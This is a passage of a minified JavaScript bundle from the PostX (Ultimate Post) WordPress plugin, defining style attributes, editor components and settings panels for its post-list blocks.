.ultp-block-content-wrap:hover .ultp-block-content{ border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout4"]}],selector:"{{ULTP}} .ultp-block-content-wrap"},{depends:[{key:"layout",condition:"==",value:["layout3","layout5"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content, \n          {{ULTP}} .ultp-layout5 .ultp-block-content"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout4"]}],selector:"{{ULTP}} .ultp-block-content-wrap:hover"},{depends:[{key:"layout",condition:"==",value:["layout3","layout5"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-wrap:hover, .ultp-block-content \n          {{ULTP}} .ultp-layout5 .ultp-block-content-wrap:hover .ultp-block-content"}]},contentWrapInnerPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2","layout4"]}],selector:"{{ULTP}} .ultp-block-content { padding: {{contentWrapInnerPadding}}; }"},{depends:[{key:"layout",condition:"==",value:["layout3","layout5"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-wrap .ultp-block-content, \n          {{ULTP}} .ultp-layout5 .ultp-block-content-wrap .ultp-block-content { padding: {{contentWrapInnerPadding}}; }"}]},contentWrapPadding:{type:"object",default:{lg:"0",ulg:"px"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { padding: {{contentWrapPadding}}; }"}]},counterTypo:{type:"object",default:{openTypography:1,size:{lg:18,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""},style:[{depends:[{key:"layout",condition:"==",value:"layout2"}],selector:"{{ULTP}} .ultp-layout2 .ultp-block-item::before"}]},counterColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{selector:"{{ULTP}} .ultp-layout2 .ultp-block-item::before { color:{{counterColor}}; }"}]},counterBgColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Contrast_2_color)"},style:[{selector:"{{ULTP}} .ultp-layout2 .ultp-block-item::before"}]},counterWidth:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-layout2 .ultp-block-item::before { width:{{counterWidth}}px; }"}]},counterHeight:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-layout2 .ultp-block-item::before { height:{{counterHeight}}px; }"}]},counterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Base_3_color)",type:"solid"},style:[{selector:"{{ULTP}} .ultp-layout2 .ultp-block-item::before"}]},counterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-layout2 .ultp-block-item::before { border-radius:{{counterRadius}}; }"}]},headingText:{type:"string",default:"Post List #3"},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto;}"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover, \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"pagination"},wrapAlign:{type:"object",default:{lg:"left"},style:[{selector:"{{ULTP}} .ultp-block-wrapper .ultp-block-item { text-align:{{wrapAlign}}; }"}]},...(0,o.t)(["heading","advFilter","advanceAttr","pagination","video","meta","category","readMore","query"],[],[{key:"queryNumPosts",default:{lg:5}},{key:"queryNumber",default:5},{key:"pagiAlign",default:{lg:"left"}},{key:"vidIconPosition",default:"center"},{key:"iconSize",default:{lg:"80",sm:"50",xs:"50",unit:"px"}},{key:"metaSeparatorColor",default:"var(--postx_preset_Contrast_3_color)"},{key:"metaSpacing",default:{lg:"10",unit:"px"}},{key:"metaMargin",default:{lg:{top:"15",bottom:"15",unit:"px"},xs:{top:"10",bottom:"10",unit:"px"}}},{key:"metaPadding",default:{lg:{top:"1",bottom:"0",unit:"px"}}},{key:"catLineColor",default:"var(--postx_preset_Contrast_1_color)"},{key:"catTypo",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""}},{key:"catColor",default:"var(--postx_preset_Contrast_1_color)"},{key:"catBgColor",default:{openColor:1,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"catHoverColor",default:"var(--postx_preset_Contrast_2_color)"},{key:"catBgHoverColor",default:{openColor:1,type:"color",color:"var(--postx_preset_Base_2_color)"}},{key:"catSacing",default:{lg:{top:0,bottom:10,left:0,right:0,unit:"px"},xs:{top:15,bottom:0,left:0,right:0,unit:"px"}}},{key:"readMore",default:!0},{key:"readMoreIcon",default:" "},{key:"readMoreTypo",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"25",unit:"px"},spacing:{lg:"",unit:"px"},transform:"uppercase",weight:"500",decoration:"underline",family:""}},{key:"readMoreColor",default:"var(--postx_preset_Contrast_1_color)"},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"readMoreHoverColor",default:"var(--postx_preset_Contrast_2_color)"},{key:"readMoreSacing",default:{lg:{top:20,bottom:"",left:"",right:"",unit:"px"},xs:{top:15,unit:"px"}}}]),V4_1_0_CompCheck:a.O,...(0,i.b)({})}},92756:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(38602),r=l(18490),s=l(2719);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-List-3/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-list-3.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postlist3.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-list-3","listBlocks")]},edit:n.Z,save:()=>null})},73576:(e,t,l)=>{"use strict";l.d(t,{Z:()=>M});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(53508),c=l(46896),u=l(71411),d=l(93985),m=l(8152),g=l(76005),y=l(99838),b=l(31760),v=l(73151),h=l(69735),f=l(2963),k=l(39349),w=l(87025),x=l(11162);const{__}=wp.i18n,{InspectorControls:T,useBlockProps:_}=wp.blockEditor,{useEffect:C,useState:E,useRef:S,Fragment:P}=wp.element,{Spinner:L,Placeholder:I}=wp.components,{getBlockAttributes:B,getBlockRootClientId:U}=wp.data.select("core/block-editor");function M(e){const t=S(null),[l,M]=E(w.Ti),[A,H]=E(null),{setAttributes:N,name:j,clientId:Z,attributes:O,isSelected:R,className:D,context:z,attributes:{blockId:F,currentPostId:W,readMoreIcon:V,imgCrop:G,imgCropSmall:q,excerptLimit:$,showFullExcerpt:K,showSmallMeta:J,metaStyle:Y,metaShow:X,catShow:Q,showImage:ee,metaSeparator:te,titleShow:le,catStyle:oe,catPosition:ae,titlePosition:ie,excerptShow:ne,imgAnimation:re,imgOverlayType:se,imgOverlay:pe,metaList:ce,metaListSmall:ue,showSmallCat:de,readMore:me,readMoreText:ge,showSmallBtn:ye,showSmallExcerpt:be,varticalAlign:ve,imgFlip:he,metaPosition:fe,layout:ke,customCatColor:we,onlyCatColor:xe,contentTag:Te,titleTag:_e,showSeoMeta:Ce,titleLength:Ee,metaMinText:Se,metaAuthorPrefix:Pe,titleStyle:Le,metaDateFormat:Ie,authorLink:Be,fallbackEnable:Ue,vidIconEnable:Me,notFoundMessage:Ae,excerptLimitLg:He,showFullExcerptLg:Ne,dcEnabled:je,dcFields:Ze,previewImg:Oe,advanceId:Re,paginationShow:De,paginationAjax:ze,headingShow:Fe,filterShow:We,paginationType:Ve,navPosition:Ge,paginationNav:qe,loadMoreText:$e,paginationText:Ke,V4_1_0_CompCheck:{runComp:Je}}}=e;function Ye(e){M({...l,selectedDC:e})}function Xe(){M({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function Qe(e){M({...l,section:{...w.ZQ,[e]:!0}}),(0,w.Rt)(e),(0,w.ob)(e),H("setting")}function et(e){M((t=>({...t,toolbarSettings:e}))),(0,w.os)(e)}function tt(){l.error&&M({...l,error:!1}),l.loading||M({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(O)}).then((e=>{M({...l,postsList:e,loading:!1})})).catch((e=>{M({...l,loading:!1,error:!0})}))}C((()=>{(0,w.oA)(),tt()}),[]),C((()=>{const t=Z.substr(0,6),l=B(U(Z));(0,a.qi)(N,l,W,Z),(0,v.h)(e),F?F&&F!=t&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||N({blockId:t})):(N({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&N({queryType:"archiveBuilder"}))}),[Z]),C((()=>{const e=t.current;(0,h.o6)()&&0===O.dcFields.length&&N({dcFields:Array(x.PR).fill(void 0)}),e?((0,a.Qr)(e,O)&&(tt(),t.current=O),e.isSelected!==R&&R&&(0,w.gT)(Qe,et)):t.current=O}),[O]);const lt={settingTab:A,setSettingTab:H,setAttributes:N,name:j,attributes:O,setSection:Qe,section:l.section,clientId:Z,context:z,setSelectedDc:Ye,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){Ye(e),et("dc_group")}};let ot;if(F&&(ot=(0,y.Kh)(O,"ultimate-post/post-list-4",F,(0,a.k0)())),Oe&&!R)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Oe});C((()=>{R&&Oe&&N({previewImg:""})}),[e?.isSelected]);const at=_({...Re&&{id:Re},className:`ultp-block-${F} ${D}`,onClick:e=>{e.stopPropagation(),Qe("general"),et("")}});return(0,o.createElement)(P,null,(0,o.createElement)(x.FP,{store:lt,selected:l.toolbarSettings}),(0,o.createElement)(b.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"layout",block:"post-list-4",key:"layout",options:[{img:"assets/img/layouts/pl4/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pl4/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pl4/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pl4/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0}]},{type:"feat_toggle",label:__("Post List Features","ultimate-post"),new:a.KE,[Je?"exclude":"dep"]:a.N2}],store:lt}),(0,o.createElement)(T,null,(0,o.createElement)(x.ZP,{store:lt})),(0,o.createElement)("div",at,ot&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:ot}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Fe||We||De)&&(0,o.createElement)(r.m,{attributes:O,setAttributes:N,onClick:()=>{Qe("heading"),et("heading")},setSection:Qe,setToolbarSettings:et}),function(){const e=`${Te}`,t=(e,t)=>(0,h.o6)()&&je&&(0,o.createElement)(k.Z,{idx:e,postId:t,fields:Ze,settingsOnClick:(e,t)=>{e?.stopPropagation(),et(t)},selectedDC:l.selectedDC,setSelectedDc:Ye,setAttributes:N,dcFields:Ze});return l.error?(0,o.createElement)(I,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(L,null)):l.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-content-${ve} ultp-block-content-${he} ultp-${ke}`},l.postsList.map(((l,a)=>{const r=0==a?JSON.parse(ce.replaceAll("u0022",'"')):JSON.parse(ue.replaceAll("u0022",'"'));return(0,o.createElement)(e,{key:a,className:`ultp-block-item ultp-block-media post-id-${l.ID}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap "+(0===a?"ultp-first-postlist-2":"ultp-all-postlist-2")},(0,o.createElement)(s.qI,{imgOverlay:pe,imgOverlayType:se,imgAnimation:re,post:l,fallbackEnable:Ue,vidIconEnable:Me,showImage:ee,idx:a,imgCrop:G,imgCropSmall:q,layout:ke,onClick:()=>{Qe("image"),et("image")},Video:Me&&l.has_video?(0,o.createElement)(s.nk,{onClick:()=>{Qe("video"),et("video")}}):null,Category:(Q&&0==a||de)&&"aboveTitle"!=ae?(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:l,catShow:Q,catStyle:oe,catPosition:ae,customCatColor:we,onlyCatColor:xe,onClick:e=>{Qe("taxonomy-/-category"),et("cat")}})):null}),(0,o.createElement)("div",{className:"ultp-block-content"},t(7,l.ID),"aboveTitle"==ae&&(0==a||de)&&(0,o.createElement)(i.Z,{post:l,catShow:Q,catStyle:oe,catPosition:ae,customCatColor:we,onlyCatColor:xe,onClick:e=>{Qe("taxonomy-/-category"),et("cat")}}),t(6,l.ID),l.title&&le&&1==ie&&(0,o.createElement)(g.Z,{title:l.title,headingTag:_e,titleLength:Ee,titleStyle:Le,onClick:e=>{Qe("title"),et("title")}}),t(5,l.ID),(0==a||J)&&X&&"top"==fe&&(0,o.createElement)(c.Z,{meta:r,post:l,metaSeparator:te,metaStyle:Y,metaMinText:Se,metaAuthorPrefix:Pe,metaDateFormat:Ie,authorLink:Be,onClick:e=>{Qe("meta"),et("meta")}}),t(4,l.ID),l.title&&le&&0==ie&&(0,o.createElement)(g.Z,{title:l.title,headingTag:_e,titleLength:Ee,titleStyle:Le,onClick:e=>{Qe("title"),et("title")}}),t(3,l.ID),(0==a||be)&&ne&&(0,o.createElement)(n.Z,{excerpt:l.excerpt,excerpt_full:l.excerpt_full,seo_meta:l.seo_meta,excerptLimit:$,showFullExcerpt:K,showSeoMeta:Ce,onClick:e=>{Qe("excerpt"),et("excerpt")}}),t(2,l.ID),(0==a||ye)&&me&&(0,o.createElement)(m.Z,{readMoreText:ge,readMoreIcon:V,titleLabel:l.title,onClick:()=>{Qe("read-more"),et("read-more")}}),t(1,l.ID),(0==a||J)&&X&&"bottom"==fe&&(0,o.createElement)(c.Z,{meta:r,post:l,metaSeparator:te,metaStyle:Y,metaMinText:Se,metaAuthorPrefix:Pe,metaDateFormat:Ie,authorLink:Be,onClick:e=>{Qe("meta"),et("meta")}}),t(0,l.ID),(0,h.o6)()&&je&&(0,o.createElement)(f.Z,{dcFields:Ze,setAttributes:N,startOnboarding:Xe}))))}))):(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:Ae})}(),De&&"loadMore"==Ve&&(0,o.createElement)(p.Z,{loadMoreText:$e,onClick:e=>{Qe("pagination"),et("pagination")}}),De&&"navigation"==Ve&&"topRight"!=Ge&&(0,o.createElement)(u.Z,{onClick:()=>{Qe("pagination"),et("pagination")}}),De&&"pagination"==Ve&&(0,o.createElement)(d.Z,{paginationNav:qe,paginationAjax:ze,paginationText:Ke,onClick:e=>{Qe("pagination"),et("pagination")}}))))}},11162:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=8,b=e=>{const{store:t}=e,{layout:l,queryType:n,advFilterEnable:r,advPaginationEnable:u,V4_1_0_CompCheck:{runComp:d}}=t.attributes,{context:y,section:b,settingTab:v,setSettingTab:h}=t;return g((()=>{(0,m.CH)(y,r,t,u)}),[r,u,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6839",store:t}),(0,o.createElement)(p.Sections,{settingTab:v,setSettingTab:h},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:t,initialOpen:b.general,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},exclude:["columns","columnGridGap"],include:[{position:0,data:{type:"layout",block:"post-list-4",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pl4/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pl4/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pl4/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pl4/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0}],variation:{layout1:{counterColor:"#767676"},layout2:{counterColor:"#767676"},layout3:{counterColor:"#767676"},layout4:{counterColor:"#fff"}}}},{position:3,data:{type:"range",key:"largeHeight",min:0,max:800,step:1,unit:!0,responsive:!0,_inline:!0,label:__("Large Image Height","ultimate-post")}},{position:4,data:{type:"range",key:"spaceLargeItem",min:0,max:100,step:1,unit:!0,responsive:!0,_inline:!0,label:__("Large Image Space","ultimate-post")}},{position:5,data:{type:"toggle",key:"imgFlip",label:__("Image Flip","ultimate-post"),pro:!0}},{position:6,data:{type:"toggle",key:"mobileImageTop",label:__("Stack on Mobile","ultimate-post")}},{position:7,data:{type:"tag",key:"varticalAlign",label:__("Vertical Align","ultimate-post"),options:[{value:"top",label:__("Top","ultimate-post")},{value:"middle",label:__("Middle","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")}]}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:b.title,include:[{position:5,data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}},{position:8,data:{type:"color",key:"lgTitleColor",label:__("Large Title Color","ultimate-post")}},{position:9,data:{type:"color",key:"lgTitleHoverColor",label:__("Large Title Hover Color","ultimate-post")}}],hrIdx:[4,12]}),(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:b.image,include:[{position:3,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgMargin"],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,depend:"metaShow",initialOpen:b.meta,include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF},{position:13,data:{tab:"style",type:"color",key:"lgMetaHoverColor",label:__("Large Meta Hover Color","ultimate-post")}}],exclude:["metaSeparator","metaStyle","metaList","metaListSmall"],hrIdx:[{tab:"settings",hr:[4]},{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:b["taxonomy-/-category"],depend:"catShow",store:t,include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}],exclude:["catPosition"],hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:b.excerpt,store:t,include:[{position:1,data:{type:"toggle",key:"showFullExcerptLg",label:__("Show Full Excerpt (Large Post)","ultimate-post")}},{position:2,data:{type:"range",key:"excerptLimitLg",label:__("Large Post Excerpt Limit","ultimate-post"),min:0,max:500,step:1,help:__("Excerpt Limit from Post Content.","ultimate-post")}},{position:4,data:{type:"toggle",key:"showSmallExcerpt",label:__("Show Small Excerpt","ultimate-post")}}],hrIdx:[6,9]}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:b["read-more"],depend:"readMore",include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}),(0,o.createElement)(a.rS,{initialOpen:b.video,depend:"vidIconEnable",store:t}),(0,o.createElement)(a.Yp,{depend:"separatorShow",store:t}),(0,o.createElement)(a.O2,{store:t,include:[{position:0,data:{type:"color",key:"overlayImgBg",label:__("Overlay Content Background Color","ultimate-post")}},{position:11,data:{type:"dimension",key:"lgContentPadding",label:__("Large Content Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}],exclude:["contenWraptWidth","contenWraptHeight"]}),("layout3"===l||"layout4"===l)&&(0,o.createElement)(a.wT,{store:t}),!d&&(0,o.createElement)(i.Z,{open:b.filter||b.pagination||b.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:t,initialOpen:b.heading,depend:"headingShow",hrIdx:[{tab:"settings",hr:[{idx:1,label:__("Heading Settings","ultimate-posts")},{idx:8,label:__("Subheading Settings","ultimate-posts")}]},{tab:"style",hr:[{idx:1,label:__("Heading Style","ultimate-posts")},{idx:12,label:__("Subheading Style","ultimate-posts")}]}]}),"posts"!=n&&"customPosts"!=n&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:b.filter,depend:"filterShow",include:[{position:1,data:a.YA},{position:2,data:a.sx}],exclude:["filterType","filterValue"],hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,initialOpen:b.pagination,depend:"paginationShow",store:t,include:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"loadMore",label:__("Load More","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")},{value:"pagination",label:__("Pagination","ultimate-post")}]}}],exclude:["paginationType"]}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:s,titleShow:p,catPosition:c,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,p&&0==m,i&&"top"==b,p&&1==m,f&&"aboveTitle"==c];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:k});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,incSettings:[{position:1,data:a.YA},{position:2,data:a.sx}],exSettings:["filterType","filterValue"],exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination 